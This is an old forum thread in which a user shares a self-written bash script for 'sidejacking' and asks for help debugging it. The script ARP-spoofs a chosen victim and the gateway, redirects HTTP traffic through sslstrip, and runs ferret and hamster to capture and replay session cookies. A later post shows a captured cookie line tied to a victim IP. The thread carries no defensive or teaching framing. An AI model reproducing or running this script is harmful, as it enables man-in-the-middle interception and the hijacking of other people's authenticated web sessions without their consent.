rufus777 Posted March 6, 2011 Posted March 6, 2011 I have a problem with "sidejacking". I have used the *.sh #!/bin/bash echo "* Firefox_proxy" echo "* 127.0.0.1:1234" echo "" echo -n "Gateway IP: " read -e ROUTER echo -n "Target IP: " read -e VICTIM mkdir sidejacking cd sidejacking echo 1 > /proc/sys/net/ipv4/ip_forward arpspoof -i wlan0 -t $VICTIM $ROUTER & iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 sslstrip -p -k -f & /pentest/sniffers/hamster/ferret -i wlan0 & /pentest/sniffers/hamster/hamster when I use ferret, simply to get: live (1): LLC: control: unparsed value: 0x0 (0) live (1): LLC: control: unparsed value: 0x0 (0) live (1): LLC: control: unparsed value: 0x0 (0) live (1): LLC: control: unparsed value: 0x0 (0) m.m what's the problem? Quote
Infiltrator Posted March 7, 2011 Posted March 7, 2011 Hey Rufus777, Take a look at this tutorial, it should be able to assist you with your issue http://hamster.erratasec.com/help/index.html Quote
rufus777 Posted March 7, 2011 Author Posted March 7, 2011 Hey Rufus777, Take a look at this tutorial, it should be able to assist you with your issue http://hamster.erratasec.com/help/index.html yes, i know... when I type in the Shell it works, but sh script that does not work! why? sorry, I'm not English so well... Quote
Infiltrator Posted March 8, 2011 Posted March 8, 2011 yes, i know... when I type in the Shell it works, but sh script that does not work! why? sorry, I'm not English so well... Where did you download the script from? Quote
rufus777 Posted March 8, 2011 Author Posted March 8, 2011 Where did you download the script from? I wrote it! :P Quote
Infiltrator Posted March 8, 2011 Posted March 8, 2011 I wrote it! :P I can't tell where the error is, but somewhere along the lines of code, you must've missed something important. Quote
rufus777 Posted March 15, 2011 Author Posted March 15, 2011 192.168.0.177 - "[email protected]|b318d8c6dfae674e||" this is the cookies or what? Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.